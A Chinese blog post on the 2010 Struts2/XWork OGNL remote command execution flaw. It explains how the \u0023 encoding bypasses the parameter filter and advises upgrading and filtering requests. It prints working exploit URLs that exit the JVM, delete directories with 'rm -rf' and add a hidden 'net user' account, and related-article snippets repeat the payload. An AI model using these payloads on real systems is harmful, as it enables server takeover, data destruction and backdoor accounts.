Struts2/XWork 安全漏洞及解决办法

最新推荐文章于 2020-12-21 05:36:51 发布
最新推荐文章于 2020-12-21 05:36:51 发布
阅读量880 收藏
点赞数
分类专栏: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuhualong1314/article/details/8466452
版权

exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏

漏洞名称:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability 

相关介绍:

Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数:


?user.address.city=Bishkek&user['favoriteDrink']=kumys

ONGL将它转换为:  

action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")

这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。 
为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值: 
此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击 

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

转义后是这样: 

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

OGNL处理时最终的结果就是 

java.lang.Runtime.getRuntime().exit(1);

类似的可以执行 

java.lang.Runtime.getRuntime().exec("rm –rf /root")

,只要有权限就可以删除任何一个目录。


创建隐藏帐户 $hack 密码 123456  ,然后还可以加入管理员之类的

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exec("net user $hack 123456 /add")')(#rt=@java.lang.Runtime@getRuntime()))=1



推荐解决方案

1.  升级到 2.2 或者更高板块的struts  .建议 2.3.1.1

2. 写一个过滤器 来过滤里面的\u0023  来处理所有的请求


 





cnstartech
关注
专栏目录
安全漏洞Struts2漏洞集合总结
HBohan的博客
01-24 3380
总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署。
struts2-xwork-ognl的源文件(jar包)
11-26
同时,源代码分析也能帮助开发者避免潜在的问题,如安全漏洞,例如著名的Struts2 S2-045远程代码执行漏洞,就是由于OGNL表达式不当处理导致的。因此,理解和掌握这些源代码不仅能提高开发效率,也有助于增强应用的...
XWork绕过安全限制执行任意命令漏洞补丁
08-20
CVE ID: CVE-2010-1870 XWork是一个命令模式框架,用于支持Struts 2及其他应用。 XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。 Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将: user.address.city=Bishkek&user['favoriteDrink']=kumys 转换为: action.getUser().getAddress().setCity("Bishkek") action.getUser().setFavoriteDrink("kumys") 这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。 除了获取和设置属性外,OGNL还支持其他一些功能: * 方法调用:foo() * 静态方式调用: @java.lang.System@exit(1) * 构建函数调用:new MyClass() * 处理上下文变量:#foo = new MyClass() 由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行: * OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true) * SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false) 为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量: * #application * #session * #request * #parameters * #attr * #context * #_memberAccess * #root * #this * #_typeResolver * #_classResolver * #_traceEvaluations * #_lastEvaluation * #_keepLastEvaluation 这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值: #_memberAccess['allowStaticMethodAccess'] = true #foo = new java .lang.Boolean("false") #context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = @java.lang.Runtime@getRuntime() #rt.exec('mkdir /tmp/PWNED')
struts2/xwork的漏洞
06-12 165
介绍struts2/xwork的Remote Command Execution Vulnerability漏洞,剖析了原因并供给了处理方法,能够拜见http://my-corner.iteye.com/blog/720209 去struts官网逛了一下,发现第一种处理方法晋级到struts2.2版别(当时的最新版),最终仍是没有彻底处理该疑问。当前,需求处理该疑问需求更新至2.3.1.2或
Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补
JAVA
07-27 284
1.exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞,此漏洞危害之大,可谓百发百中,直接root,只要采用了Struts2和webwork框架的系统(对于webwork的版本,不太清楚,我这里没环境对其一一测试,这里有两者关系的介绍),基本上无一幸免。 2.昨天在接到朋友的提醒后,迅速将公司的一些使用此框架开发的项目漏洞修补了,我想大部分大公司的也在第一时...
Struts2_045漏洞修复jar包和检测工具(亲测可用)
05-14
Struts2_045漏洞修复jar包和检测工具 freemarker-2.3.22.jar ognl-3.0.21.jar struts2-core-2.3.34.jar xwork-core-2.3.34.jar struts2-json-plugin-2.3.34.jar struts2-junit-plugin-2.3.34.jar struts2-spring-...
struts2.3.22所需的所有jar包解决struts2安全漏洞问题
04-24
Struts2是一款非常流行的Java Web框架,用于构建和维护动态网站应用程序。...总的来说,解决Struts2安全漏洞需要及时跟进框架的更新,正确替换所有相关jar包,并进行充分的测试,以确保应用的安全性和稳定性。
Apache的Struts2框架严重安全漏洞
07-20
这次提到的安全漏洞主要涉及Struts2OGNL(Object-Graph Navigation Language)表达式语言。OGNL是一种强大的表达式语言,用于获取和设置对象的属性。然而,如果框架配置不当或者没有充分过滤用户输入,攻击者可以...
XWork ParameterInterceptor类绕过安全限制漏洞-描述
weixin_33721344的博客
07-19 345
      ? XWork ParameterInterceptor类绕过安全限制漏洞     问题描述:     XWork ParameterInterceptor类绕过安全限制漏洞         发布日期:2010-07-09     更新日期:2010-07-15         受影响系统:   ...
Struts2/XWork 安全漏洞解决办法(了解)
cgh4752423的专栏
09-19 656
exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞。 漏洞名称:Struts2/XWork 相关介绍: http://www.exploit-db.com/exploits/14360/http://sebug.net/exploit/19954/ Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/
struts2远程执行漏洞学习(三)
ice
02-24 217
        这个是终结部分了。     除了#_memberAccess.allowStaticMethodAccess'是一个关键属性外,'xwork.MethodAccessor.denyMethodExecution’是另一个关键属性,意义如同名字,这个属性决定了是否可以执行方法,只有当这个属性为false时,我们才可以利用ognl自定义变量,调用一些关键的方法 例如FileWrite...
S2-003 远程代码执行漏洞
Fly_鹏程万里
12-14 1329
漏洞信息 漏洞信息页面: https://cwiki.apache.org/confluence/display/WW/S2-003 漏洞成因官方概述:XWork ParameterInterceptors bypass allows OGNL statement execution 漏洞影响: 环境搭建 s2-003漏洞的payload用到了特殊字符,在高版本tomcat中会失败,...
Struts2漏洞分析
z69183787的专栏
09-03 2748
当在浏览器输入如下地址时:        http://www.xxxx.com/aaa.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')
php strus2 漏洞攻击_Struts2远程命令执行漏洞防范与分析
weixin_39850150的博客
12-21 441
防止Struts远程攻击命令解决方案是:1.对使用struts2框架的jar包打补丁(升级到官方指定的版本)2.或者修改对应jar中的ongl处理逻辑,然后编译打包替换旧的文件。3.可使用安恒信息扫描器检测漏洞,运用安恒信息waf防护漏洞,安全点就只保留字母数字,其它的全部删除即可。接下来我们看看如何利用strus漏洞远程执行命令进行攻击的方式第一种攻击方式:新建一个文件,在文件中写入一下自己的东...
Struts 2命令执行漏洞
a65783305的博客
06-29 241
2010年7月9日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。 这个漏洞的细节描述公布在exploit-db 上。 在这里简单摘述如下: XWork通过getters/setters...
Struts2与XWork2交互解析及Struts1.0原理
Struts 1.x版本在业界广泛使用,但随着技术的发展,Struts2应运而生,它引入了更先进的设计模式和框架,如XWork,以解决Struts1的一些局限性。 Struts2是基于XWork2的核心,它在Struts1的基础上进行了大量的改进和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值